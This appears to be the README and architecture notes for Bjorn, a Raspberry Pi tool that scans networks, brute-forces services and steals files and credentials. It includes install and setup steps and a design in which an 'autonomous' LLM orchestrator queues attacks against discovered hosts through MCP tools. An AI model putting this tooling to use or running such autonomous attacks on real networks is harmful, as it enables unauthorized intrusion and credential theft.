4. **Vulnerability Scanning**: Performs vulnerability scans on identified hosts and updates the vulnerability summary.
5. **Brute-Force Attacks and File Stealing**: Starts brute-force attacks and steals files based on the configuration criteria.
6. **Display Updates**: Continuously updates the e-Paper HAT display with current information such as network status, vulnerabilities, and various statistics. Bjorn also displays random comments based on different themes and statuses.
7. **Web Server**: Provides a web interface for monitoring and interacting with Bjorn.
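The sequence above can be sketched as one supervisory loop with the display and web server running in background threads. Every function name here is illustrative, not Bjorn's actual API:

```python
# Hedged sketch of the run order described above (steps 2-7).
# All callables are passed in; none of these names exist in Bjorn itself.
import threading

def run_bjorn(scan_network, orchestrate, start_display, start_webserver,
              stop_event, interval_s=1.0):
    """Start background UI threads, then loop: scan -> orchestrate."""
    threading.Thread(target=start_display, daemon=True).start()    # step 6: EPD updates
    threading.Thread(target=start_webserver, daemon=True).start()  # step 7: web UI
    while not stop_event.is_set():
        hosts = scan_network()       # step 2: update netkb
        orchestrate(hosts)           # steps 3-5: vuln scans, attacks, file stealing
        stop_event.wait(interval_s)  # idle between cycles
```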
## ▶️ Running Bjorn
### 📗 Manual Start
To manually start Bjorn (outside the service), first make sure the service is stopped with `sudo systemctl stop bjorn.service`:
```bash
cd /home/bjorn/Bjorn
# Run Bjorn
sudo python Bjorn.py
```
### 🕹️ Service Control
Control the Bjorn service:
```bash
# Start Bjorn
sudo systemctl start bjorn.service
# Stop Bjorn
sudo systemctl stop bjorn.service
# Check status
sudo systemctl status bjorn.service
# View logs
sudo journalctl -u bjorn.service
```
### 🪄 Fresh Start
To reset Bjorn to a clean state:
```bash
sudo rm -rf /home/bjorn/Bjorn/config/*.json \
/home/bjorn/Bjorn/data/*.csv \
/home/bjorn/Bjorn/data/*.log \
/home/bjorn/Bjorn/data/output/data_stolen/* \
/home/bjorn/Bjorn/data/output/crackedpwd/* \
/home/bjorn/Bjorn/config/* \
/home/bjorn/Bjorn/data/output/scan_results/* \
/home/bjorn/Bjorn/__pycache__ \
/home/bjorn/Bjorn/config/__pycache__ \
/home/bjorn/Bjorn/data/__pycache__ \
/home/bjorn/Bjorn/actions/__pycache__ \
/home/bjorn/Bjorn/resources/__pycache__ \
/home/bjorn/Bjorn/web/__pycache__ \
/home/bjorn/Bjorn/*.log \
/home/bjorn/Bjorn/resources/waveshare_epd/__pycache__ \
/home/bjorn/Bjorn/data/logs/* \
/home/bjorn/Bjorn/data/output/vulnerabilities/* \
/home/bjorn/Bjorn/data/logs/*
```
Everything will be recreated automatically at the next launch of Bjorn.
## ❇️ Important Configuration Files
### 🔗 Shared Configuration (`shared_config.json`)
Defines various settings for Bjorn, including:
- Boolean settings (`manual_mode`, `websrv`, `debug_mode`, etc.).
- Time intervals and delays.
- Network settings.
- Port lists and blacklists.
These settings are accessible on the webpage.
### 🛠️ Actions Configuration (`actions.json`)
Lists the actions to be performed by Bjorn (generated dynamically from the contents of the `actions/` folder), including:
- Module and class definitions.
- Port assignments.
- Parent-child relationships.
- Action status definitions.
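As a hedged illustration, an entry might look like the following — the field names below are purely illustrative, so mirror an existing entry in your own `actions.json` rather than copying this verbatim:

```json
{
  "my_action": {
    "b_module": "my_action",
    "b_class": "MyAction",
    "b_port": 22,
    "b_parent": null,
    "b_status": "MyActionStatus"
  }
}
```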
## 📟 E-Paper Display Support
Currently supported: the 2.13-inch V2 & V4 e-Paper HATs.
The program automatically detects the screen model and adapts its drawing code accordingly.
For other versions:
- The V1 and V3 models could not be tested (no hardware was available to validate the detection algorithm), so they may or may not work.
### 🍾 Ghosting Removed!
While making Bjorn work across the different screen versions, I experimented with many display parameters and discovered that it is possible to remove screen ghosting entirely. Have a look at the display code; this method should be useful for any other project using an e-Paper screen!
## ✍️ Development Guidelines
### Adding New Actions
1. Create a new action file in `actions/`.
2. Implement required methods:
- `__init__(self, shared_data)`
- `execute(self, ip, port, row, status_key)`
3. Add the action to `actions.json`.
4. Follow existing action patterns.
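A hypothetical skeleton for `actions/my_action.py` following the required method signatures; the return values and logger usage are assumptions inferred from the description of the existing connectors, not guaranteed by the project:

```python
# Template action module (hypothetical). Only the two method signatures
# are taken from the guidelines above; everything else is illustrative.
import logging

logger = logging.getLogger(__name__)

class MyAction:
    """Probe one ip:port and report success or failure."""

    def __init__(self, shared_data):
        self.shared_data = shared_data  # config, paths, shared counters

    def execute(self, ip, port, row, status_key):
        try:
            logger.info("MyAction running against %s:%s", ip, port)
            # ... actual work here (connect, test credentials, steal files) ...
            return "success"  # assumed to be recorded in netkb under status_key
        except Exception as exc:
            logger.error("MyAction failed on %s:%s: %s", ip, port, exc)
            return "failed"
```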
### 🧪 Testing
1. Create a test environment.
2. Use an isolated network.
3. Follow ethical guidelines.
4. Document test cases.
## 💻 Web Interface
- **Access**: `http://[device-ip]:8000`
- **Features**:
- Real-time monitoring with a console.
- Configuration management.
- Viewing results. (Credentials and files)
- System control.
## 🧭 Project Roadmap
### 🪛 Current Focus
- Stability improvements.
- Bug fixes.
- Service reliability.
- Documentation updates.
### 🧷 Future Plans
- Additional attack modules.
- Enhanced reporting.
- Improved user interface.
- Extended protocol support.
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.
## 🔧 Installation and Configuration
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Prerequisites](#-prerequisites)
- [Quick Install](#-quick-install)
- [Manual Install](#-manual-install)
- [License](#-license)
Use [Raspberry Pi Imager](https://www.raspberrypi.com/software/) to install your OS.
### 📌 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📌 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
Bjorn was not originally developed for the Raspberry Pi Zero 2 W (64-bit), but several users have reported that the installation works perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment, the e-Paper screen V2 and V4 have been tested and implemented; the V1 and V3 are expected, but not guaranteed, to work the same way.
### ⚡ Quick Install
The fastest way to install Bjorn is to use the automatic installation script:
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh
sudo ./install_bjorn.sh
# Choose option 1 for automatic installation. It may take a while, as many packages and modules will be installed. Reboot when it finishes.
```
### 🧰 Manual Install
#### Step 1: Activate SPI & I2C
```bash
sudo raspi-config
```
- Navigate to **"Interface Options"**.
- Enable **SPI**.
- Enable **I2C**.
#### Step 2: System Dependencies
```bash
# Update system
sudo apt-get update && sudo apt-get upgrade -y
# Install required packages
sudo apt install -y \
libjpeg-dev \
zlib1g-dev \
libpng-dev \
python3-dev \
libffi-dev \
libssl-dev \
libgpiod-dev \
libi2c-dev \
libatlas-base-dev \
build-essential \
python3-pip \
wget \
lsof \
git \
libopenjp2-7 \
nmap \
libopenblas-dev \
bluez-tools \
bluez \
dhcpcd5 \
bridge-utils \
python3-pil
# Update Nmap scripts database
sudo nmap --script-updatedb
```
#### Step 3: Bjorn Installation
```bash
# Clone the Bjorn repository
cd /home/bjorn
git clone https://github.com/infinition/Bjorn.git
cd Bjorn
# Install Python dependencies system-wide
sudo pip install -r requirements.txt --break-system-packages
# A stable installation inside a virtual environment has not been achieved yet,
# so the dependencies are installed system-wide (--break-system-packages).
# This has caused no issues so far; you can still try a virtual environment if you want.
```
##### 3.1: Configure E-Paper Display Type
Choose your e-Paper HAT version by modifying the configuration file:
1. Open the configuration file:
```bash
sudo vi /home/bjorn/Bjorn/config/shared_config.json
```
2. Press `i` to enter insert mode.
3. Locate the line containing `"epd_type"` and change the value according to your screen model:
   - For 2.13 V1: `"epd_type": "epd2in13",`
   - For 2.13 V2: `"epd_type": "epd2in13_V2",`
   - For 2.13 V3: `"epd_type": "epd2in13_V3",`
   - For 2.13 V4: `"epd_type": "epd2in13_V4",`
4. Press `Esc` to exit insert mode, then type `:wq` and press `Enter` to save and quit.
#### Step 4: Configure File Descriptor Limits
To prevent `OSError: [Errno 24] Too many open files`, it's essential to increase the file descriptor limits.
##### 4.1: Modify File Descriptor Limits for All Users
Edit `/etc/security/limits.conf`:
```bash
sudo vi /etc/security/limits.conf
```
Add the following lines:
```
* soft nofile 65535
* hard nofile 65535
root soft nofile 65535
root hard nofile 65535
```
##### 4.2: Configure Systemd Limits
Edit `/etc/systemd/system.conf`:
```bash
sudo vi /etc/systemd/system.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
Edit `/etc/systemd/user.conf`:
```bash
sudo vi /etc/systemd/user.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
##### 4.3: Create or Modify `/etc/security/limits.d/90-nofile.conf`
```bash
sudo vi /etc/security/limits.d/90-nofile.conf
```
Add:
```
root soft nofile 65535
root hard nofile 65535
```
##### 4.4: Adjust the System-wide File Descriptor Limit
Edit `/etc/sysctl.conf`:
```bash
sudo vi /etc/sysctl.conf
```
Add:
```
fs.file-max = 2097152
```
Apply the changes:
```bash
sudo sysctl -p
```
#### Step 5: Reload Systemd and Apply Changes
Reload systemd to apply the new file descriptor limits:
```bash
sudo systemctl daemon-reload
```
#### Step 6: Modify PAM Configuration Files
PAM (Pluggable Authentication Modules) manages how limits are enforced for user sessions. To ensure that the new file descriptor limits are respected, update the following configuration files.
##### Step 6.1: Edit `/etc/pam.d/common-session` and `/etc/pam.d/common-session-noninteractive`
```bash
sudo vi /etc/pam.d/common-session
sudo vi /etc/pam.d/common-session-noninteractive
```
Add this line at the end of both files:
```
session required pam_limits.so
```
This ensures that the limits set in `/etc/security/limits.conf` are enforced for all user sessions.
#### Step 7: Configure Services
##### 7.1: Bjorn Service
Create the service file:
```bash
sudo vi /etc/systemd/system/bjorn.service
```
Add the following content:
```ini
[Unit]
Description=Bjorn Service
DefaultDependencies=no
Before=basic.target
After=local-fs.target
[Service]
ExecStartPre=/home/bjorn/Bjorn/kill_port_8000.sh
ExecStart=/usr/bin/python3 /home/bjorn/Bjorn/Bjorn.py
WorkingDirectory=/home/bjorn/Bjorn
StandardOutput=inherit
StandardError=inherit
Restart=always
User=root
# Check open files and restart if it reached the limit (ulimit -n buffer of 1000)
ExecStartPost=/bin/bash -c 'FILE_LIMIT=$(ulimit -n); THRESHOLD=$(( FILE_LIMIT - 1000 )); while :; do TOTAL_OPEN_FILES=$(lsof | wc -l); if [ "$TOTAL_OPEN_FILES" -ge "$THRESHOLD" ]; then echo "File descriptor threshold reached: $TOTAL_OPEN_FILES (threshold: $THRESHOLD). Restarting service."; systemctl restart bjorn.service; exit 0; fi; sleep 10; done &'
[Install]
WantedBy=multi-user.target
```
##### 7.2: Port 8000 Killer Script
Create the script to free up port 8000:
```bash
vi /home/bjorn/Bjorn/kill_port_8000.sh
```
Add:
```bash
#!/bin/bash
PORT=8000
PIDS=$(lsof -t -i:$PORT)
if [ -n "$PIDS" ]; then
echo "Killing PIDs using port $PORT: $PIDS"
kill -9 $PIDS
fi
```
Make the script executable:
```bash
chmod +x /home/bjorn/Bjorn/kill_port_8000.sh
```
##### 7.3: USB Gadget Configuration
Modify `/boot/firmware/cmdline.txt`:
```bash
sudo vi /boot/firmware/cmdline.txt
```
Add the following right after `rootwait`:
```
modules-load=dwc2,g_ether
```
Modify `/boot/firmware/config.txt`:
```bash
sudo vi /boot/firmware/config.txt
```
Add at the end of the file:
```
dtoverlay=dwc2
```
Create the USB gadget script:
```bash
sudo vi /usr/local/bin/usb-gadget.sh
```
Add the following content:
```bash
#!/bin/bash
set -e
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: ECM network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/ecm.usb0
# Check for existing symlink and remove if necessary
if [ -L configs/c.1/ecm.usb0 ]; then
rm configs/c.1/ecm.usb0
fi
ln -s functions/ecm.usb0 configs/c.1/
# Ensure the device is not busy before listing available USB device controllers
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
# Check if the usb0 interface is already configured
if ! ip addr show usb0 | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0
else
echo "Interface usb0 already configured."
fi
```
Make the script executable:
```bash
sudo chmod +x /usr/local/bin/usb-gadget.sh
```
Create the systemd service:
```bash
sudo vi /etc/systemd/system/usb-gadget.service
```
Add:
```ini
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
```
Configure `usb0`:
```bash
sudo vi /etc/network/interfaces
```
Add:
```bash
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
```
Reload the services:
```bash
sudo systemctl daemon-reload
sudo systemctl enable systemd-networkd
sudo systemctl enable usb-gadget
sudo systemctl start systemd-networkd
sudo systemctl start usb-gadget
```
You must reboot before the device can be used as a USB gadget (with its static IP).
###### Windows PC Configuration
Set the static IP address on your Windows PC:
- **IP Address**: `172.20.2.2`
- **Subnet Mask**: `255.255.255.0`
- **Default Gateway**: `172.20.2.1`
- **DNS Servers**: `8.8.8.8`, `8.8.4.4`
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.
MIT License
Copyright (c) 2024 infinition
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
# BJORN — LLM Bridge, MCP Server & LLM Orchestrator
## Complete architecture, operation, commands, fallbacks
---
## Table of contents
1. [Overview](#1-overview)
2. [Created / modified files](#2-created--modified-files)
3. [LLM Bridge (`llm_bridge.py`)](#3-llm-bridge-llm_bridgepy)
4. [MCP Server (`mcp_server.py`)](#4-mcp-server-mcp_serverpy)
5. [LLM Orchestrator (`llm_orchestrator.py`)](#5-llm-orchestrator-llm_orchestratorpy)
6. [Orchestrator & Scheduler integration](#6-orchestrator--scheduler-integration)
7. [Web Utils LLM (`web_utils/llm_utils.py`)](#7-web-utils-llm-web_utilsllm_utilspy)
8. [EPD comment integration (`comment.py`)](#8-epd-comment-integration-commentpy)
9. [Configuration (`shared.py`)](#9-configuration-sharedpy)
10. [HTTP Routes (`webapp.py`)](#10-http-routes-webapppy)
11. [Web interfaces](#11-web-interfaces)
12. [Startup (`Bjorn.py`)](#12-startup-bjornpy)
13. [LaRuche / LAND Protocol compatibility](#13-laruche--land-protocol-compatibility)
14. [Optional dependencies](#14-optional-dependencies)
15. [Quick activation & configuration](#15-quick-activation--configuration)
16. [Complete API endpoint reference](#16-complete-api-endpoint-reference)
17. [Queue priority system](#17-queue-priority-system)
18. [Fallbacks & graceful degradation](#18-fallbacks--graceful-degradation)
19. [Call sequences](#19-call-sequences)
---
## 1. Overview
```
┌─────────────────────────────────────────────────────────────────────┐
│ BJORN (RPi) │
│ │
│ ┌─────────────┐ ┌──────────────────┐ ┌─────────────────────┐ │
│ │ Core BJORN │ │ MCP Server │ │ Web UI │ │
│ │ (unchanged) │ │ (mcp_server.py) │ │ /chat.html │ │
│ │ │ │ 7 exposed tools │ │ /mcp-config.html │ │
│ │ comment.py │ │ HTTP SSE / stdio │ │ ↳ Orch Log button │ │
│ │ ↕ LLM hook │ │ │ │ │ │
│ └──────┬──────┘ └────────┬─────────┘ └──────────┬──────────┘ │
│ └─────────────────────────────────────────────┘ │
│ │ │
│ ┌──────────────────────────▼─────────────────────────────────┐ │
│ │ LLM Bridge (llm_bridge.py) │ │
│ │ Singleton · Thread-safe │ │
│ │ │ │
│ │ Automatic cascade: │ │
│ │ 1. LaRuche node (LAND/mDNS → HTTP POST /infer) │ │
│ │ 2. Local Ollama (HTTP POST /api/chat) │ │
│ │ 3. External API (Anthropic / OpenAI / OpenRouter) │ │
│ │ 4. None (→ fallback templates in comment.py) │ │
│ │ │ │
│ │ Agentic tool-calling loop (stop_reason=tool_use, ≤6 turns) │ │
│ │ _BJORN_TOOLS: 7 tools in Anthropic format │ │
│ └─────────────────────────────────────────────────────────────┘ │
│ │ │
│ ┌──────────────────────────▼─────────────────────────────────┐ │
│ │ LLM Orchestrator (llm_orchestrator.py) │ │
│ │ │ │
│ │ mode = none → LLM has no role in scheduling │ │
│ │ mode = advisor → LLM suggests 1 action/cycle (prio 85) │ │
│ │ mode = autonomous→ own thread, loop + tools (prio 82) │ │
│ │ │ │
│ │ Fingerprint (hosts↑, vulns↑, creds↑, queue_id↑) │ │
│ │ → skip LLM if nothing new (token savings) │ │
│ └─────────────────────────────────────────────────────────────┘ │
│ │ │
│ ┌──────────────────────────▼─────────────────────────────────┐ │
│ │ Action Queue (SQLite) │ │
│ │ scheduler=40 normal=50 MCP=80 autonomous=82 advisor=85│ │
│ └─────────────────────────────────────────────────────────────┘ │
└─────────────────────────────────────────────────────────────────────┘
↕ mDNS _ai-inference._tcp.local. (zeroconf)
┌──────────────────────────────────────────┐
│ LaRuche Swarm (LAN) │
│ Node A → Mistral 7B :8419 │
│ Node B → DeepSeek Coder :8419 │
│ Node C → Phi-3 Mini :8419 │
└──────────────────────────────────────────┘
```
**Design principles:**
- Everything is **disabled by default** — zero impact if not configured
- All dependencies are **optional** — silent import if missing
- **Systematic fallback** at every level — Bjorn never crashes because of the LLM
- The bridge is a **singleton** — one instance per process, thread-safe
- EPD comments preserve their **exact original behaviour** if LLM is disabled
- The LLM is the **brain** (decides what to do), the orchestrator is the **arms** (executes)
---
## 2. Created / modified files
### Created files
| File | Approx. size | Role |
|------|-------------|------|
| `llm_bridge.py` | ~450 lines | LLM Singleton — backend cascade + agentic tool-calling loop |
| `mcp_server.py` | ~280 lines | FastMCP MCP Server — 7 Bjorn tools |
| `web_utils/llm_utils.py` | ~220 lines | LLM/MCP HTTP endpoints (web_utils pattern) |
| `llm_orchestrator.py` | ~410 lines | LLM Orchestrator — advisor & autonomous modes |
| `web/chat.html` | ~300 lines | Chat interface + Orch Log button |
| `web/mcp-config.html` | ~400 lines | LLM & MCP configuration page |
### Modified files
| File | What changed |
|------|-------------|
| `shared.py` | +45 config keys (LLM bridge, MCP, orchestrator) |
| `comment.py` | LLM hook in `get_comment()` — 12 lines added |
| `utils.py` | +1 entry in lazy WebUtils registry: `"llm_utils"` |
| `webapp.py` | +9 GET/POST routes in `_register_routes_once()` |
| `Bjorn.py` | LLM Bridge warm-up + conditional MCP server start |
| `orchestrator.py` | +`LLMOrchestrator` lifecycle + advisor call in background tasks |
| `action_scheduler.py` | +skip scheduler if LLM autonomous only (`llm_orchestrator_skip_scheduler`) |
| `requirements.txt` | +3 comment lines (optional dependencies documented) |
---
## 3. LLM Bridge (`llm_bridge.py`)
### Internal architecture
```
LLMBridge (Singleton)
├── __init__() Initialises singleton, launches LaRuche discovery
├── complete() Main API — cascades all backends
│ └── tools=None/[...] Optional param to enable tool-calling
├── generate_comment() Generates a short EPD comment (≤80 tokens)
├── chat() Stateful chat with per-session history
│ └── tools=_BJORN_TOOLS if llm_chat_tools_enabled=True
├── clear_history() Clears a session's history
├── status() Returns bridge state (for the UI)
├── _start_laruche_discovery() Starts mDNS thread in background
├── _discover_laruche_mdns() Listens to _ai-inference._tcp.local. continuously
├── _call_laruche() Backend 1 — POST http://[node]:8419/infer
├── _call_ollama() Backend 2 — POST http://localhost:11434/api/chat
├── _call_anthropic() Backend 3a — POST api.anthropic.com + AGENTIC LOOP
│ └── loop ≤6 turns: send → tool_use → execute → feed result → repeat
├── _call_openai_compat() Backend 3b — POST [base_url]/v1/chat/completions
├── _execute_tool(name, inputs) Dispatches to mcp_server._impl_*
│ └── gate: checks mcp_allowed_tools before executing
└── _build_system_prompt() Builds system prompt with live Bjorn context
_BJORN_TOOLS : List[Dict] Anthropic-format definitions for the 7 MCP tools
```
### _BJORN_TOOLS — full list
```python
_BJORN_TOOLS = [
{"name": "get_hosts", "description": "...", "input_schema": {...}},
{"name": "get_vulnerabilities", ...},
{"name": "get_credentials", ...},
{"name": "get_action_history", ...},
{"name": "get_status", ...},
{"name": "run_action", ...}, # gated by mcp_allowed_tools
{"name": "query_db", ...}, # SELECT only
]
```
### Backend cascade
```
llm_backend = "auto" → LaRuche → Ollama → API → None
llm_backend = "laruche" → LaRuche only
llm_backend = "ollama" → Ollama only
llm_backend = "api" → External API only
```
At each step, if a backend fails (timeout, network error, missing model), the next one is tried **silently**. If all fail, `complete()` returns `None`.
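The cascade amounts to a try-in-order loop. A minimal sketch — the function names are illustrative, not the actual `llm_bridge.py` API:

```python
# Sketch of the silent backend cascade: first non-empty reply wins,
# any failure (timeout, network error, missing model) falls through.
from typing import Callable, List, Optional

def complete_with_cascade(backends: List[Callable[[str], Optional[str]]],
                          prompt: str) -> Optional[str]:
    """Try each backend in order; return None when every backend fails."""
    for call in backends:
        try:
            reply = call(prompt)
            if reply:
                return reply
        except Exception:
            continue  # swallow the error and try the next backend
    return None
```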
### Agentic tool-calling loop (`_call_anthropic`)
When `tools` is passed to `complete()`, the Anthropic backend enters agentic mode:
```
_call_anthropic(messages, system, tools, max_tokens, timeout)
├─ POST /v1/messages {tools: [...]}
├─ [stop_reason = "tool_use"]
│ for each tool_use block:
│ result = _execute_tool(name, inputs)
│ append {role: "tool", tool_use_id: ..., content: result}
│ POST /v1/messages [messages + tool results] ← next turn
└─ [stop_reason = "end_turn"] → returns final text
[≥6 turns] → returns partial text + warning
```
`_execute_tool()` dispatches directly to `mcp_server._impl_*` (no network), checking `mcp_allowed_tools` for `run_action`.
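The loop above can be modelled in a few lines, assuming the standard Anthropic tool-use message shapes; `call_api` and `execute_tool` stand in for the real HTTP round-trip and `_execute_tool()`:

```python
# Simplified model of the agentic tool-calling loop (not the real code).
MAX_TURNS = 6  # mirrors the <=6-turn cap described above

def agentic_loop(call_api, execute_tool, messages):
    """Drive tool-use turns until the model stops or the turn cap is hit."""
    for _ in range(MAX_TURNS):
        reply = call_api(messages)                  # one POST round-trip
        if reply["stop_reason"] != "tool_use":
            return reply["text"]                    # end_turn: final answer
        messages.append({"role": "assistant", "content": reply["content"]})
        results = []
        for block in reply["content"]:
            if block["type"] == "tool_use":
                out = execute_tool(block["name"], block["input"])
                results.append({"type": "tool_result",
                                "tool_use_id": block["id"],
                                "content": out})
        messages.append({"role": "user", "content": results})
    return "(partial answer: tool-use turn limit reached)"
```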
### Tool-calling in chat (`chat()`)
If `llm_chat_tools_enabled = True`, the chat passes `tools=_BJORN_TOOLS` to the backend, letting the LLM answer with real-time data (hosts, vulns, creds…) rather than relying only on its training knowledge.
### Chat history
- Each session has its own history (key = `session_id`)
- Special session `"llm_orchestrator"`: contains the autonomous orchestrator's reasoning
- Max size configurable: `llm_chat_history_size` (default: 20 messages)
- History is **in-memory only** — not persisted across restarts
- Thread-safe via `_hist_lock`
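The history store described above can be sketched with one bounded deque per session behind a single lock. Class and field names here are assumptions, not the real implementation:

```python
# In-memory, per-session, bounded chat history (sketch).
import threading
from collections import defaultdict, deque

class ChatHistory:
    def __init__(self, max_messages=20):  # llm_chat_history_size default
        self._hist = defaultdict(lambda: deque(maxlen=max_messages))
        self._lock = threading.Lock()

    def append(self, session_id, role, content):
        with self._lock:
            self._hist[session_id].append({"role": role, "content": content})

    def get(self, session_id):
        with self._lock:
            return list(self._hist[session_id])  # copy, safe to iterate

    def clear(self, session_id):
        with self._lock:
            self._hist.pop(session_id, None)
```

The `deque(maxlen=...)` silently drops the oldest message once the cap is reached, so no explicit trimming code is needed.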
---
## 4. MCP Server (`mcp_server.py`)
### What is MCP?
The **Model Context Protocol** (Anthropic) is an open-source protocol that lets AI agents (Claude Desktop, custom agents, etc.) use external tools via a standardised interface.
By enabling Bjorn's MCP server, **any MCP client can query and control Bjorn** — without knowing the internal DB structure.
### Exposed tools
| Tool | Arguments | Description |
|------|-----------|-------------|
| `get_hosts` | `alive_only: bool = True` | Returns discovered hosts (IP, MAC, hostname, OS, ports) |
| `get_vulnerabilities` | `host_ip: str = ""`, `limit: int = 100` | Returns discovered CVE vulnerabilities |
| `get_credentials` | `service: str = ""`, `limit: int = 100` | Returns captured credentials (SSH, FTP, SMB…) |
| `get_action_history` | `limit: int = 50`, `action_name: str = ""` | History of executed actions |
| `get_status` | *(none)* | Real-time state: mode, active action, counters |
| `run_action` | `action_name: str`, `target_ip: str`, `target_mac: str = ""` | Queues a Bjorn action (MCP priority = 80) |
| `query_db` | `sql: str`, `params: str = "[]"` | Free SELECT against the SQLite DB (read-only) |
**Security:** each tool checks `mcp_allowed_tools` — unlisted tools return a clean error. `query_db` rejects anything that is not a `SELECT`.
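The read-only gate for `query_db` can be approximated like this — a sketch of the idea, not the actual validation code:

```python
# Accept a single SELECT statement, reject everything else
# (no statement stacking, no writes).
import re

def is_safe_select(sql: str) -> bool:
    stripped = sql.strip().rstrip(";").strip()
    if ";" in stripped:  # a second statement hidden after a semicolon
        return False
    return re.match(r"(?i)^select\b", stripped) is not None
```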
### `_impl_run_action` — priority detail
```python
_MCP_PRIORITY = 80 # > scheduler(40) > normal(50)
sd.db.queue_action(
action_name=action_name,
mac=mac, # resolved from hosts WHERE ip=? if not supplied
ip=target_ip,
priority=_MCP_PRIORITY,
trigger="mcp",
metadata={"decision_method": "mcp", "decision_origin": "mcp"},
)
sd.queue_event.set() # wakes the orchestrator immediately
```
### Available transports
| Transport | Config | Usage |
|-----------|--------|-------|
| `http` (default) | `mcp_transport: "http"`, `mcp_port: 8765` | Accessible from any MCP client on LAN via SSE |
| `stdio` | `mcp_transport: "stdio"` | Claude Desktop, CLI agents |
---
## 5. LLM Orchestrator (`llm_orchestrator.py`)
The LLM Orchestrator transforms Bjorn from a scriptable tool into an autonomous agent. It is **completely optional and disableable** via `llm_orchestrator_mode = "none"`.
### Operating modes
| Mode | Config value | Operation |
|------|-------------|-----------|
| Disabled | `"none"` (default) | LLM plays no role in planning |
| Advisor | `"advisor"` | LLM consulted periodically, suggests 1 action |
| Autonomous | `"autonomous"` | Own thread, LLM observes + plans with tools |
### Internal architecture
```
LLMOrchestrator
├── start() Starts autonomous thread if mode=autonomous
├── stop() Stops thread (join 15s max)
├── restart_if_mode_changed() Called from orchestrator.run() each iteration
├── is_active() True if autonomous thread is alive
├── [ADVISOR MODE]
│ advise() → called from orchestrator._process_background_tasks()
│ ├── _build_snapshot() → compact dict (hosts, vulns, creds, queue)
│ ├── LLMBridge().complete(prompt, system)
│ └── _apply_advisor_response(raw, allowed)
│ ├── parse JSON {"action": str, "target_ip": str, "reason": str}
│ ├── validate action ∈ allowed
│ └── db.queue_action(priority=85, trigger="llm_advisor")
└── [AUTONOMOUS MODE]
_autonomous_loop() Thread "LLMOrchestrator" (daemon)
└── loop:
_compute_fingerprint() → (hosts, vulns, creds, max_queue_id)
_has_actionable_change() → skip if nothing increased
_run_autonomous_cycle()
├── filter tools: read-only always + run_action if in allowed
├── LLMBridge().complete(prompt, system, tools=[...])
│ └── _call_anthropic() agentic loop
│ → LLM calls run_action via tools
│ → _execute_tool → _impl_run_action → queue
└── if llm_orchestrator_log_reasoning=True:
logger.info("[LLM_ORCH_REASONING]...")
_push_to_chat() → "llm_orchestrator" session in LLMBridge
sleep(llm_orchestrator_interval_s)
```
### Fingerprint and smart skip
```python
def _compute_fingerprint(self) -> tuple:
# (host_count, vuln_count, cred_count, max_completed_queue_id)
return (hosts, vulns, creds, last_id)
def _has_actionable_change(self, fp: tuple) -> bool:
if self._last_fingerprint is None:
return True # first cycle always runs
# Triggers ONLY if something INCREASED
# hosts going offline → not actionable
return any(fp[i] > self._last_fingerprint[i] for i in range(len(fp)))
```
**Token savings:** if `llm_orchestrator_skip_if_no_change = True` (default), the LLM cycle is skipped if no new hosts/vulns/creds and no action completed since the last cycle.
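The increase-only rule can be exercised in isolation (standalone sketch of the comparison above):

```python
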